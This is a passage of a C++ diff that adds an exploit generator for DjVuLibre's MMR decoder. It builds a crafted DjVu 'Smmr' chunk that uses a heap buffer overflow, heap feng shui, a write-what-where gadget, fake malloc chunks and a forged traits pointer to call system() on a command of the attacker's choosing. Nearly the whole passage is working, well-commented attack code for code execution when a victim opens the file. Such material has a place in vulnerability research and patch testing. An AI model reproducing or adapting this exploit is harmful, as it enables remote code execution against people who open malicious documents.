&lineno, uint16_t target, ++ uint32_t stop) { ++ write_VL1(packer); ++ write_H_odd(packer, 0x0, 0x0); ++ write_H_odd(packer, 0x0, 0x0); ++ write_H_odd(packer, 0x0, 0x0); ++ write_H_odd(packer, 0x0, stop | target); ++ lineno++; ++} ++ ++// Copy a uint16_t from one location to another. The 8 bytes below it ++// in memory will get trashed. At the destination site, (up to) 12 ++// bytes of garbage get written above it, but not below. Therefore, ++// this operation can be used to move an arbitrary number of bytes ++// from one location to another. (The number of bytes must be even ++// though.) The move is destructive to the source if you want to copy ++// more than 2 bytes, because the bytes below the current ones keep ++// getting trashed. The solution is to move the bytes to a staging ++// area where they're separated by extra zeros and then copy them back ++// later. ++// ++// The advantage of using this function to copy a uint16_t is that it ++// is able to handle the special case where the value is zero. If you ++// know that the value is non-zero then there are simpler ways to copy ++// it. For example, in many places I'm able to copy a pointer in one ++// go, using three V0 instructions, because the heap feng shui has ++// ensured that none of the byte pairs in the pointer are zero. But ++// when I'm copying a fully unknown pointer, like a pointer to ++// system(), then there's a chance that the middle byte pair will be ++// zero due to ASLR. ++// ++// Zero is an awkward special case due to the complicated way that b1 ++// is updated in MMRDecoder::scanruns(). 
The solution is to add 1 to ++// the number and then subtract it with the VL1 operation. This ++// involves adding two extra steps, so this function uses 6 steps ++// rather than 4. ++static void copy_uint16(BitPacker &packer, size_t &lineno, uint16_t src, ++ uint16_t dst) { ++ // 1 ++ // Modify prevruns. ++ write_VL1(packer); ++ write_H_odd(packer, 0x0, 0x0); ++ write_H_odd(packer, 0x0, 0x0); ++ write_H_odd(packer, 0x0, 0x0); ++ write_H_odd(packer, 0x0, 0x40000 | (src - 8)); ++ lineno++; ++ ++ // 2 ++ // Write 0x0000, 0x0000, 0x0000, 0x0001 below the bytes that I want ++ // to copy. The 0x0001 is a workaround for the special case where ++ // the uint16_t that I want to copy is zero. The 0x0001 gets added ++ // to the uint16_t and then subtracted by the VL1 operation in the ++ // next step. ++ write_H_even(packer, 0x0, 0x0); ++ write_H_even(packer, 0x0, 0x40001); ++ lineno++; ++ ++ // 3 ++ // Copy byte pair back and modify prevruns so that I can copy them ++ // to the destination. ++ write_H_even(packer, 0x0, 0x0); ++ write_H_even(packer, 0x0, 0x0); ++ write_VL1(packer); ++ write_H_odd(packer, 0x0, 0x0); ++ write_H_odd(packer, 0x0, 0x40000 | dst); ++ lineno++; ++ ++ // 4 ++ // skip step at destination ++ write_H_even(packer, 0x0, 0x40000); ++ lineno++; ++ ++ // 5 ++ // Write a 1 below the bytes so that I can do the same trick as ++ // before. ++ write_H_even(packer, 0x0, 0x0); ++ write_H_even(packer, 0x0, 0x40001); ++ lineno++; ++ ++ // 6 ++ // Copy to dst ++ write_P(packer); ++ write_VL1(packer); ++ write_H_odd(packer, 0xc000, 0xc000); ++ write_H_odd(packer, 0xc000, 0xc000); ++ lineno++; ++} + +-static void +-create_photo_djvu_file(IW44Image &iw, int w, int h, +- IFFByteStream &iff, int nchunks, IWEncoderParms xparms[]) +-{ ++// Add two uint16_t values and also output a carry bit. The two input ++// values should be stored at p, p+2 before calling this function. The ++// carry bit will be written to p-2 and the addition result to p+10. ++// ++// The 16 bytes below dcd.prevruns are used as a working area. ++// ++// The addition is computed by this loop: ++// (https://sourceforge.net/p/djvu/djvulibre-git/ci/42029c33b2fb25bc1fa98c80b2be83a2fa23cce1/tree/libdjvu/MMRDecoder.cpp#l748) ++// ++// // Next reference run ++// for(;b1<=a0 && b1= 0x10000 (i.e. if there's a carry bit). That second ++// iteration adds another 0x10000, so it doesn't change the output. ++// But it means that pr has been incremented 4 bytes more than if ++// there was no carry. The next instruction is a V0, which will output ++// a 2 if there was a carry or 1 if there wasn't. (It's easier to copy ++// a non-zero value so that's why I use 1,2 rather than 0,1.) ++static void add_with_carry(BitPacker &packer, size_t &lineno, uint16_t p) { ++ // 1 ++ // Point prevruns just above the two values ++ write_VL1(packer); ++ write_H_odd(packer, 0x0, 0x0); ++ write_H_odd(packer, 0x0, 0x0); ++ write_H_odd(packer, 0x0, 0x0); ++ write_H_odd(packer, 0x40000, p + 4); ++ lineno++; ++ ++ // 2 ++ // Write some values that will compute the carry bit. 
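++ // (Editorial aside, not in the original patch: a concrete instance of
++ // the trick described above. The pair (0x2, 0xfffe) written next sums
++ // to exactly 0x10000, so the quoted scanruns() loop takes its second
++ // iteration precisely when the two summands at p and p+2 carry past
++ // 0xffff. Example: x = 0xfff0, y = 0x0020 gives 0x10010, the extra
++ // iteration fires, pr advances 4 extra bytes, and the V0 below emits
++ // 2; with x = 0x0010, y = 0x0020 the sum is 0x0030, there is no extra
++ // iteration, and the V0 emits 1.)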
++ write_H_even(packer, 0x2, 0xfffe); // sum == 0x10000 ++ write_H_even(packer, 0x1, 0x0); ++ write_H_even(packer, 0x0, 0x1ffff); ++ lineno++; ++ ++ // 3 ++ // Point prevruns 6 bytes below the two values ++ write_VL1(packer); ++ write_H_odd(packer, 0x0, 0x0); ++ write_H_odd(packer, 0x0, 0x0); ++ write_H_odd(packer, 0x0, 0x0); ++ write_H_odd(packer, 0x40000, p - 6); ++ lineno++; ++ ++ // 4 ++ // write zeros below the two values ++ write_VL1(packer); ++ write_H_odd(packer, 0x0, 0x40000); ++ lineno++; ++ ++ // 5 ++ // Compute the addition and write the carry bit ++ write_H_even(packer, 0x0, 0x0); ++ write_H_even(packer, 0x0, 0xffff); ++ write_V0(packer); ++ write_V0(packer); ++ write_H_even(packer, 0xffff, 0x40000); ++ lineno++; ++ ++ // 6 ++ // Copy the addition result out ++ write_H_even(packer, 0x0, 0x0); ++ write_H_even(packer, 0x0, 0x0); ++ write_H_even(packer, 0x0, 0x0); ++ write_H_even(packer, 0x0, 0x0); ++ write_V0(packer); ++ write_H_odd(packer, 0x0, 0x40000); ++ lineno++; ++ ++ // 7 ++ // wipe the addition result ++ write_VL1(packer); ++ write_H_odd(packer, 0x0, 0x0); ++ write_H_odd(packer, 0x0, 0x40000); ++ lineno++; ++ ++ // 8 ++ // Copy the carry bit out ++ write_H_even(packer, 0x0, 0x0); ++ write_V0(packer); ++ write_H_odd(packer, 0x0, 0x40000); ++ lineno++; ++} ++ ++// Adds a uint16_t increment to a 64-bit pointer. ++static void pointer_add(BitPacker &packer, size_t &lineno, uint16_t src, ++ uint16_t dst, uint16_t incr, ++ bool write_trailer = true) { ++ // Scratch area for add_with_carry to use ++ uint16_t s = offsetof_adder_area; ++ ++ // Copy increment to scratch area ++ modify_prevruns(packer, lineno, s - 6, 0x40000); ++ write_H_even(packer, 0x0, 0x0); ++ write_H_even(packer, 0x40000, incr); ++ lineno++; ++ ++ // Copy components. Only 3 iterations are needed because the top two ++ // bytes of a pointer are always zero. ++ for (size_t i = 0; i < 3; i++) { ++ // Copy component to scratch area ++ copy_uint16(packer, lineno, src, s + 2); ++ ++ // Add increment or carry bit to component ++ add_with_carry(packer, lineno, s); ++ ++ // Copy result out ++ copy_uint16(packer, lineno, s + 10, dst); ++ ++ // Carry bit was written to s-2, so it's easiest to shift the scratch area. ++ s -= 2; ++ ++ // Move to next component ++ src += 2; ++ dst += 2; ++ } ++} ++ ++// Use the buffer overflow on dcd->lineruns to modify ++// dcd->width. (Heap feng shui has ensured that lineruns is stored ++// immediately below dcd in memory.) This function should be followed ++// by a call to write_stop(). ++static void overwrite_width(BitPacker &packer, uint16_t prefixlen) { ++ // Buffer overflow ++ for (size_t i = prefixlen; i < distance_lineruns_to_dcd + offsetof_dcd_width; ++ i += 4) { ++ write_H_even(packer, 0x0, 0x0); ++ } ++ ++ // Overwrite width ++ write_H_even(packer, 0x0, 0x3); // 0x30000 ++ ++ // Overwrite height ++ write_H_even(packer, 0x0, 0x1); // 0x10000 ++ ++ // Overwrite lineno ++ write_H_even(packer, 0x0, 0x0); ++ ++ // Overwrite striplineno ++ write_H_even(packer, 0x0, 0x0); ++ ++ // Overwrite rowsperstrip ++ write_H_even(packer, 0x0, 0x1); // 0x10000 ++ ++ // Overwrite line and gline ++ write_H_even(packer, 0x0, 0x0); ++ write_H_even(packer, 0x0, 0x0); ++ write_H_even(packer, 0x0, 0x0); ++ write_H_even(packer, 0x0, 0x0); ++ write_H_even(packer, 0x0, 0x0); ++} ++ ++// This overwrites dcd->lineruns with a pointer to dcd->glineruns. ++// That gives me the ability to overwrite prevruns, which means I can ++// now write bytes to any location. 
(Previously, I could also write to ++ any location, but it was a one-shot thing because the only way to ++ do it a second time was by trashing all the memory between the ++ first location and dcd.) ++static void create_write_what_where_gadget(BitPacker &packer, size_t &lineno) { ++ // Almost all the bytes between prevruns and &dcd->lineruns are ++ // currently zero. The exceptions are the handful of non-zero values ++ // that I've set in dcd, such as dcd->width and dcd->height. Also, ++ // lineno and striplineno have both been incremented once since I ++ // zeroed them in overwrite_width(). So at this moment in time, ++ // those values sum to 7. So, in order for the first byte pair of ++ // the pointer to get successfully loaded into b1, I need to set a0 ++ // = 7. ++ write_H_even(packer, 0x0, 0x7); ++ write_H_even(packer, 0x0, 0x0); ++ write_V0(packer); ++ write_V0(packer); ++ write_V0(packer); ++ write_H_odd(packer, 0x0, 0x40000); // stop ++ lineno++; ++ ++ // skip line ++ write_stop(packer, lineno, 0x40000); ++ ++ // write large number below the address in prevruns ++ write_H_even(packer, 0x0, 0x0); ++ write_H_even(packer, 0x0, 0x50000 - 0x1); ++ lineno++; ++ ++ // Next line. ++ write_H_even(packer, 0x0, ++ 0x10000 - ++ (distance_prevruns_to_dcd + offsetof_dcd_lineruns + 0xe)); ++ overwrite_width(packer, 0x4); ++ write_H_even(packer, 0x0, 0x0); ++ write_V0(packer); ++ write_V0(packer); ++ write_V0(packer); ++ write_H_odd(packer, 0x0, 0x30000); // stop ++ lineno++; ++ ++ // skip line ++ write_stop(packer, lineno, 0x40000); ++ ++ // At this moment, dcd still points to the original prevruns, but ++ // dcd->lineruns now points to &dcd->glineruns, which is 0x10 bytes below ++ // &dcd->prevruns in memory. ++} ++ ++// Write n zero bytes at destination. n should be a multiple of 4. ++static void wipe_bytes_at_dst(BitPacker &packer, size_t &lineno, uint16_t dst, ++ size_t n, uint32_t stop) { ++ if (n % 4 != 0) { ++ G_THROW(ERR_MSG("wipe_bytes_at_dst: n is not a multiple of 4")); ++ } ++ ++ // Set target pointer. ++ modify_prevruns(packer, lineno, dst, stop); ++ ++ for (size_t i = 0; i + 4 < n; i += 4) { ++ write_H_even(packer, 0x0, 0x0); ++ } ++ write_stop(packer, lineno, stop); ++} ++ ++// Write a pointer to dcd in the scratch area so that I can retrieve it ++// when I need it. ++static void make_backup_ptr(BitPacker &packer, size_t &lineno) { ++ // Set target pointer. ++ modify_prevruns(packer, lineno, offsetof_dcd_ptr_backup - 0x8, 0x40000); ++ ++ // This will copy the pointer that is currently stored in dcd->prevruns, ++ // which is a pointer to 0x10 below &dcd->prevruns. This subtracts an ++ // offset from it to calculate a pointer to dcd. ++ write_H_even(packer, 0x0, offsetof_dcd_prevruns - 0x10); ++ write_H_even(packer, 0x0, 0x0); ++ write_V0(packer); ++ write_V0(packer); ++ write_V0(packer); ++ write_H_odd(packer, 0x0, 0x40000); // stop ++ lineno++; ++} ++ ++// Overwrite prevruns with an address that's at a relative offset from ++// dcd. This uses the pointer that I've stored at the fixed (relative to ++// the current arena) address offsetof_dcd_ptr_backup. The offset ++// is subtracted. ++static void modify_prevruns_relative(BitPacker &packer, size_t &lineno, ++ uint16_t offset, uint32_t stop) { ++ modify_prevruns(packer, lineno, offsetof_dcd_ptr_backup - 0x8, stop); ++ ++ // skip ++ write_stop(packer, lineno, stop); ++ ++ // Copy pointer back.
++ write_H_even(packer, 0x0, offset); ++ write_H_even(packer, 0x0, 0x0); ++ write_H_even(packer, 0x0, 0x0); ++ write_H_even(packer, 0x0, 0x0); ++ write_V0(packer); ++ write_V0(packer); ++ write_V0(packer); ++ write_H_odd(packer, 0x0, stop); // stop ++ lineno++; ++} ++ ++// This overwrites jimg->blits.data and also modifies the size field ++// immediately above it. This operation is a bit tricky because the ++// data field is immediately preceded by the traits field, which I ++// cannot overwrite. ++static void modify_jimg_blits(BitPacker &packer, size_t &lineno, ++ uint16_t field_offset, uint16_t dst, ++ uint16_t minlo, uint16_t maxhi, uint16_t lobound, ++ uint16_t hibound) { ++ modify_prevruns_relative(packer, lineno, distance_jimg_to_dcd - field_offset, ++ 0x40000); ++ ++ // Copy pointer to &prevruns to jimg->blits.data, but with zeros ++ // below it so that I can copy it back out and modify it. ++ write_H_even(packer, 0x0, 0x0); ++ write_V0(packer); ++ write_V0(packer); ++ write_V0(packer); ++ write_H_odd(packer, 0x0, 0x40000); // stop ++ lineno++; ++ ++ // Copy pointer back to dcd, where I can modify it. It is stored at ++ // &glineruns + 0x4. ++ write_H_even(packer, 0x0, 0x0); ++ write_V0(packer); ++ write_V0(packer); ++ write_V0(packer); ++ write_H_odd(packer, 0x0, 0x40000); // stop ++ lineno++; ++ ++ // skip line ++ write_stop(packer, lineno, 0x40000); ++ ++ // Overwrite bottom two bytes of the pointer. ++ write_VL1(packer); ++ write_H_odd(packer, 0x0, 0x40000 | dst); // stop ++ lineno++; ++ ++ // Copy pointer to jimg properly this time. ++ write_P(packer); ++ write_V0(packer); ++ write_V0(packer); ++ write_V0(packer); ++ ++ // Overwrite size fields ++ write_H_odd(packer, 0x0, minlo); // data{6,7}, minlo{0,1} ++ write_H_odd(packer, 0x0, maxhi); // minlo{2,3}, maxhi{0,1} ++ write_H_odd(packer, 0x0, lobound); // maxhi{2,3}, lobound{0,1} ++ write_H_odd(packer, 0x0, hibound); // lobound{2,3}, hibound{0,1} ++ write_H_odd(packer, 0x0, 0x0); // hibound{2,3}, reproduce_old_bug ++ ++ // Need to be precise with the stop condition because I haven't left ++ // a prefix that can be overwritten, so I can't let it rewind. So I ++ // need to add just enough to a0 that it will only just overflow ++ // past 0x30000. Luckily I know the exact uint16_t values that I've ++ // written to everything except data{2,3} and data{4,5}. And I also ++ // know that those two values are non-zero. ++ uint16_t knowntotal = dst + minlo + maxhi + lobound + hibound; ++ write_H_odd(packer, 0x0, 0x10000 - knowntotal); // stop ++ // Total value written so far is 0x10000 + data{2,3} + data{4,5}, so ++ // I know that: 0x10002 <= a0 <= 0x2fffe. Therefore, this will cause ++ // a stop that won't rewind: ++ write_H_odd(packer, 0xffff, 0xffff); // stop ++ lineno++; ++} ++ ++static void forge_pointer(BitPacker &packer, size_t &lineno, uint16_t p, ++ uint16_t target) { ++ modify_prevruns(packer, lineno, p - 4, 0x40000); ++ ++ write_H_even(packer, 0x0, 0x0); ++ write_V0(packer); ++ write_V0(packer); ++ write_V0(packer); ++ write_H_odd(packer, 0x0, 0x40000); // stop ++ lineno++; ++ ++ // skip line ++ write_stop(packer, lineno, 0x40000); ++ ++ // Overwrite bottom two bytes of the pointer. ++ write_VL1(packer); ++ write_H_odd(packer, 0x0, 0x40000 | target); // stop ++ lineno++; ++} ++ ++// This modifies fake_bitmap->gbytes_data, so that fake_bitmap will get ++// freed at the end of the pass. This also wipes bytes_data, but it ++// isn't used so that doesn't matter. 
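Before the function itself, a deliberately simplified standalone sketch of the mechanism (a toy stand-in, not DjVuLibre's actual GP/GBitmap code): a refcounted handle frees whatever its internal pointer designates, so redirecting that pointer with the write gadget turns an ordinary end-of-pass destruction into a free() of an attacker-forged chunk.

```cpp
#include <cstdlib>

// Toy stand-in for a handle like fake_bitmap's gbytes_data.
struct Handle {
  void *p;
  ~Handle() { free(p); }  // destruction frees whatever p designates
};

int main() {
  Handle h{malloc(0x90)};
  void *fake = malloc(0x90);  // stand-in for the forged fake_bitmap chunk
  // Simulate the pointer overwrite performed via the write-what-where
  // gadget. (h's original chunk is leaked; irrelevant to the point.)
  h.p = fake;
  return 0;  // ~Handle now frees `fake`, handing it back to the allocator
}
```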
++static void prepare_fake_bitmap_for_reuse(BitPacker &packer, size_t &lineno) { ++ uint16_t p = offsetof_fake_bitmap + offsetof_bytes_data; ++ modify_prevruns(packer, lineno, p, 0x40000); ++ write_VL1(packer); ++ write_H_odd(packer, 0x0, 0x0); ++ write_H_odd(packer, 0x0, 0x40000 | offsetof_fake_bytes_data); ++ lineno++; ++ ++ // Forge a pointer to fake_bitmap. ++ forge_pointer(packer, lineno, offsetof_fake_bytes_data, offsetof_fake_bitmap); ++} ++ ++// Zero final two bytes of grle and go all the way to the first two ++// bytes of grlerows. grlerows should point at offsetof_fake_rlerows. ++static void prepare_fake_bitmap_grlerows(BitPacker &packer, size_t &lineno) { ++ uint16_t p = offsetof_fake_bitmap + offsetof_rle; ++ ++ modify_prevruns(packer, lineno, p + 14, 0x40000); ++ for (p = offsetof_grle + 0x6; p < offsetof_grlerows - 2; p += 4) { ++ write_H_even(packer, 0x0, 0x0); ++ } ++ write_H_even(packer, 0x0, 0x40000 | offsetof_fake_rlerows); // stop ++ lineno++; ++} ++ ++// This prepares the fake bitmap so that this memcpy will get ++// called: ++// ++// https://sourceforge.net/p/djvu/djvulibre-git/ci/42029c33b2fb25bc1fa98c80b2be83a2fa23cce1/tree/libdjvu/GBitmap.cpp#l1236 ++// ++// The source pointer for the memcpy needs to be copied to rle after ++// this function finishes. dst is the destination of the memcpy. dst ++// needs to point to a fake chunk, which will get freed and then ++// immediately reallocated. size is the number of bytes that will be ++// memcpy'd, which must match the size of the fake chunk at dst. ++static void prepare_fake_bitmap_for_memcpy(BitPacker &packer, size_t &lineno, ++ uint16_t dst, uint16_t size) { ++ // Forge a pointer to dst in fake_rlerows. ++ forge_pointer(packer, lineno, offsetof_fake_rlerows, dst); ++ ++ // Modify rlelength ++ modify_prevruns(packer, lineno, offsetof_fake_bitmap + offsetof_rlelength - 4, ++ 0x40000); ++ write_H_even(packer, 0x0, 0x0); ++ write_H_even(packer, size, 0x40000); // stop ++ lineno++; ++} ++ ++// Helper for create_fake_chunks(). ++static void create_fake_chunk_body(BitPacker &packer, size_t &lineno, ++ uint16_t &offset, uint16_t size) { ++ const uint16_t end = offset + size + 0x10; ++ write_H_even(packer, size + 0x15, 0x0); ++ offset += 4; ++ while (offset < end) { ++ write_H_even(packer, 0x0, 0x0); ++ offset += 4; ++ } ++} ++ ++// Create some fake malloc chunks at the specified offset. ++static void create_fake_chunks(BitPacker &packer, size_t &lineno, ++ uint16_t offset, ++ const std::vector<uint16_t> &sizes, ++ uint32_t stop) { ++ // Reserve an extra 4 bytes because they'll get zeroed at the end of the line. ++ offset -= 0xc; ++ modify_prevruns(packer, lineno, offset, stop); ++ ++ write_H_even(packer, 0x0, 0x0); ++ offset += 4; ++ ++ // create n chunks. ++ size_t n = sizes.size(); ++ for (size_t i = 0; i < n; i++) { ++ create_fake_chunk_body(packer, lineno, offset, sizes[i]); ++ } ++ create_fake_chunk_body(packer, lineno, offset, 0x10); ++ write_H_even(packer, 0x25, stop); // stop ++ lineno++; ++} ++ ++// Write the shell command string. ++static void write_command(BitPacker &packer, size_t &lineno, uint16_t dst, ++ const char *cmd) { ++ // Sum the uint16_t values so that I can set the width to the correct value. ++ size_t n = strlen(cmd); ++ uint32_t total = 0; ++ ++ for (size_t i = 0; i < n; i += 4) { ++ uint16_t p[2] = {0, 0}; ++ memcpy(p, &cmd[i], std::min(sizeof(p), n - i)); ++ total += p[0] + p[1]; ++ } ++ ++ // Add 1 to the total to use as a stop value.
++ total++; ++ ++ // Need to modify width manually because it needs a bigger ++ // stop value than usual. ++ uint32_t stop = ((total >> 16) + 2) << 16; ++ // Point prevruns at dcd. ++ modify_prevruns_relative(packer, lineno, 0, 0x40000); ++ for (size_t i = 0; i < offsetof_dcd_width; i += 4) { ++ write_H_even(packer, 0, 0); ++ } ++ write_H_even(packer, total & 0xffff, stop | (total >> 16)); ++ lineno++; ++ ++ modify_prevruns(packer, lineno, dst, stop); ++ for (size_t i = 0; i < n; i += 4) { ++ uint16_t p[2] = {0, 0}; ++ memcpy(p, &cmd[i], std::min(sizeof(p), n - i)); ++ write_H_even(packer, p[0], p[1]); ++ } ++ ++ write_H_even(packer, 0, 1); // stop ++ lineno++; ++ ++ // reset width ++ modify_prevruns_relative(packer, lineno, 0, stop); ++ for (size_t i = 0; i < offsetof_dcd_width; i += 4) { ++ write_H_even(packer, 0, 0); ++ } ++ write_H_even(packer, 0x0, stop | 0x3); ++ lineno++; ++} ++ ++static void chunk_Smmr(IFFByteStream &iff, ++ const uint16_t distance_traits_to_strtol, ++ const uint16_t distance_strtol_to_system, ++ const char *command) { ++ iff.put_chunk("Smmr"); ++ uint8_t magic[4] = {'M', 'M', 'R', '\0'}; ++ iff.get_bytestream()->write(magic, sizeof(magic)); ++ ++ // This choice of width will allocate a chunk of size 0x220, which is ++ // waiting in the tcache thanks to the feng shui phase which just ++ // happened. It means that dcd->lineruns will get allocated immediately ++ // below dcd in memory, so I can use the buffer overflow to corrupt dcd. ++ const uint16_t width = (0x10 * 0x21) / 2; ++ ++ // `height` is the number of lines. It needs to be bigger than the number ++ // of steps in the exploit. For example, it gets decremented every time ++ // write_stop is called. It is also used in the calculation of ++ // `blocksize`. ++ const uint16_t height = 100 * 22; ++ const uint16_t blocksize = ++ std::min(500, std::max(64, std::max(width / 17, height / 22))); ++ const uint16_t blocksperline = (width + blocksize - 1) / blocksize; ++ ++ iff.get_bytestream()->write16(width); // width ++ iff.get_bytestream()->write16(height); // height ++ ++ uint8_t bitbuf[0x20000]; ++ BitPacker packer(bitbuf, sizeof(bitbuf)); ++ size_t lineno = 0; ++ uint16_t p = 0; ++ ++ // Pass 0 ++ lineno = 0; ++ ++ // skip ++ firstrun(packer, lineno, width, blocksize, blocksperline); ++ ++ overwrite_width(packer, 0x0); ++ write_stop(packer, lineno, 0x40000); ++ ++ create_write_what_where_gadget(packer, lineno); ++ ++ // Clean the memory in the scratch area. ++ wipe_bytes_at_dst(packer, lineno, offsetof_scratch_area, ++ offsetof_scratch_area_end - offsetof_scratch_area, 0x40000); ++ ++ make_backup_ptr(packer, lineno); ++ ++ // Copy arena pointer components. ++ copy_uint16(packer, lineno, offsetof_dcd_ptr_backup + 2, arena_ptrbytes_2_3); ++ copy_uint16(packer, lineno, offsetof_dcd_ptr_backup + 4, arena_ptrbytes_4_5); ++ ++ // The backup pointer got trashed by copy_uint16, so build it again. ++ make_backup_ptr(packer, lineno); ++ ++ std::vector fake_chunk_sizes = {sizeof_GBitmap, sizeof_fake_chunk, ++ sizeof_fake_chunk}; ++ create_fake_chunks(packer, lineno, offsetof_fake_bitmap, fake_chunk_sizes, ++ 0x40000); ++ ++ // Overwrite jimg->blits.data and tinker with its size fields so ++ // that it will get reallocated at the end of this pass. I'll use it ++ // to free fake_bitmap so that it will get allocated on the next ++ // pass. ++ modify_jimg_blits(packer, lineno, offsetof_blits_data, offsetof_fake_bitmap, ++ 0, 4, 0, 4); ++ ++ // Point prevruns somewhere safe. 
++ modify_prevruns(packer, lineno, offsetof_scratch_area, 0x40000); ++ ++ // padding to finish the pass ++ while (lineno < blocksize) { ++ write_stop(packer, lineno, 0x30000 | lineno); ++ } ++ ++ // Pass 1 ++ lineno = 0; ++ ++ // skip ++ write_stop(packer, lineno, 0x30002); ++ ++ prepare_fake_bitmap_for_reuse(packer, lineno); ++ ++ prepare_fake_bitmap_grlerows(packer, lineno); ++ ++ prepare_fake_bitmap_for_memcpy(packer, lineno, offsetof_fake_chunk1, ++ sizeof_fake_chunk); ++ ++ // Write a pointer to jimg to fake_bitmap->rle, so that the memcpy will ++ // copy the contents of jimg to fake_chunk, where it's easier to work with ++ // because it's at a fixed offset. ++ modify_prevruns(packer, lineno, offsetof_fake_bitmap + offsetof_rle - 4, ++ 0x40000); ++ ++ // Calculate the address of jimg relative to the address stored in ++ // dcd.prevruns. ++ write_H_even(packer, 0x0, ++ distance_jimg_to_dcd + offsetof_dcd_prevruns - 0x10); ++ write_V0(packer); ++ write_V0(packer); ++ write_V0(packer); ++ // Overwrite bottom bytes of grle so that it points at fake_bitmap->bytes. ++ write_H_odd(packer, 0x40000, offsetof_fake_bitmap + offsetof_bytes); // stop ++ lineno++; ++ ++ // Point prevruns somewhere safe. ++ modify_prevruns(packer, lineno, offsetof_scratch_area, 0x40000); ++ ++ // padding to finish the pass ++ while (lineno < blocksize) { ++ write_stop(packer, lineno, 0x30000 | lineno); ++ } ++ ++ // Pass 2 ++ lineno = 0; ++ ++ // skip ++ write_stop(packer, lineno, 0x30002); ++ ++ // Split the traits pointer into separate components, because I ++ // need to use it twice and it'll get trashed if I use pointer_add ++ // on it directly. ++ p = offsetof_fake_chunk1 + offsetof_blits_traits; ++ copy_uint16(packer, lineno, p + 0, traits_ptrbytes_0_1); ++ copy_uint16(packer, lineno, p + 2, traits_ptrbytes_2_3); ++ copy_uint16(packer, lineno, p + 4, traits_ptrbytes_4_5); ++ ++ // Restore the traits pointer in its original location. ++ copy_uint16(packer, lineno, traits_ptrbytes_0_1, p + 0); ++ copy_uint16(packer, lineno, traits_ptrbytes_2_3, p + 2); ++ copy_uint16(packer, lineno, traits_ptrbytes_4_5, p + 4); ++ ++ prepare_fake_bitmap_for_reuse(packer, lineno); ++ ++ prepare_fake_bitmap_grlerows(packer, lineno); ++ ++ prepare_fake_bitmap_for_memcpy(packer, lineno, offsetof_fake_chunk2, ++ sizeof_fake_chunk); ++ ++ // Reconstruct the traits pointer in fake_bitmap->rle. ++ p = offsetof_fake_bitmap + offsetof_rle; ++ copy_uint16(packer, lineno, traits_ptrbytes_0_1, p + 0); ++ copy_uint16(packer, lineno, traits_ptrbytes_2_3, p + 2); ++ copy_uint16(packer, lineno, traits_ptrbytes_4_5, p + 4); ++ ++ // Reconstruct grle ++ p = offsetof_fake_bitmap + offsetof_grle; ++ modify_prevruns(packer, lineno, p - 2, 0x40000); ++ write_H_even(packer, 0x0, offsetof_fake_bitmap + offsetof_bytes); ++ write_H_even(packer, 0xffff - offsetof_fake_bitmap + offsetof_bytes, 0xaaab); ++ write_H_even(packer, 0xaaab, 0xaaab); ++ lineno++; ++ ++ copy_uint16(packer, lineno, arena_ptrbytes_2_3, p + 2); ++ copy_uint16(packer, lineno, arena_ptrbytes_4_5, p + 4); ++ ++ modify_prevruns(packer, lineno, p + 6, 0x40000); ++ write_stop(packer, lineno, 0x40000); ++ ++ // Point prevruns somewhere safe. 
++ modify_prevruns(packer, lineno, offsetof_scratch_area, 0x40000); ++ ++ // padding to finish the pass ++ while (lineno < blocksize) { ++ write_stop(packer, lineno, 0x30000 | lineno); ++ } ++ ++ // Pass 3 ++ lineno = 0; ++ ++ // skip ++ write_stop(packer, lineno, 0x30002); ++ ++ prepare_fake_bitmap_for_reuse(packer, lineno); ++ ++ prepare_fake_bitmap_grlerows(packer, lineno); ++ ++ // fake chunk 1 currently contains a copy of jimg, which I don't ++ // need anymore after this pass, so it can be used as the memcpy ++ // destination. ++ prepare_fake_bitmap_for_memcpy(packer, lineno, offsetof_fake_chunk1, ++ sizeof_fake_chunk); ++ ++ pointer_add(packer, lineno, offsetof_fake_chunk1 + offsetof_blits_traits, ++ offsetof_fake_bitmap + offsetof_rle, ++ distance_traits_to_strtol - 0x10); ++ ++ // Reconstruct grle ++ p = offsetof_fake_bitmap + offsetof_grle; ++ modify_prevruns(packer, lineno, p - 2, 0x40000); ++ write_H_even(packer, 0x0, offsetof_fake_bitmap + offsetof_bytes); ++ write_H_even(packer, 0xffff - offsetof_fake_bitmap + offsetof_bytes, 0xaaab); ++ write_H_even(packer, 0xaaab, 0xaaab); ++ lineno++; ++ ++ copy_uint16(packer, lineno, arena_ptrbytes_2_3, p + 2); ++ copy_uint16(packer, lineno, arena_ptrbytes_4_5, p + 4); ++ ++ modify_prevruns(packer, lineno, p + 6, 0x40000); ++ write_stop(packer, lineno, 0x40000); ++ ++ // Point prevruns somewhere safe. ++ modify_prevruns(packer, lineno, offsetof_scratch_area, 0x40000); ++ ++ // padding to finish the pass ++ while (lineno < blocksize) { ++ write_stop(packer, lineno, 0x30000 | lineno); ++ } ++ ++ // Pass 4 ++ lineno = 0; ++ ++ // skip ++ write_stop(packer, lineno, 0x30002); ++ ++ // Build a fake traits. I've already memcpy'd the traits to the ++ // fake_chunk2, so I just need to overwrite the fini field with ++ // a pointer to system. ++ uint16_t faketraits = offsetof_fake_chunk2; ++ ++ // A pointer to __GI___isoc23_strtol is currently stored at fake_chunk1 + ++ // 0x10. Add an offset to get the address of system and write it into the fini ++ // field of the fake traits. ++ pointer_add(packer, lineno, offsetof_fake_chunk1 + 0x10, faketraits + 0x20, ++ distance_strtol_to_system); ++ ++ // zero top two bytes of the pointer ++ modify_prevruns(packer, lineno, faketraits + 0x26, 0x40000); ++ write_stop(packer, lineno, 0x40000); ++ ++ write_command(packer, lineno, offsetof_command, command); ++ ++ modify_jimg_blits(packer, lineno, offsetof_blits_traits, faketraits, 0, 0, 0, ++ 0); ++ ++ // Point jimg->blits.data at the command string and modify the size ++ // fields so that jimg->blits.traits->fini() will get called on it. ++ modify_jimg_blits(packer, lineno, offsetof_blits_data, offsetof_command, 0, 0, ++ 2, 0); ++ ++ // Point prevruns somewhere safe. ++ modify_prevruns(packer, lineno, offsetof_scratch_area, 0x40000); ++ ++ // padding to finish the pass ++ while (lineno < blocksize) { ++ write_stop(packer, lineno, 0x30000 | lineno); ++ } ++ ++ iff.get_bytestream()->write(bitbuf, packer.byteoffset()); ++ ++ iff.close_chunk(); ++} ++ ++// Make a comment string of a specific length by repeating the message. 
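++// (Editorial note, not in the original patch: when the file is decoded
++// in the viewer, each of these comment strings is allocated on the
++// decoder's heap, so choosing exact byte lengths — e.g. the 0xbdf-byte
++// comment below that opens the hole later reused for jimg, prevruns,
++// lineruns, and dcd — is presumably what shapes the thread-local arena.)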
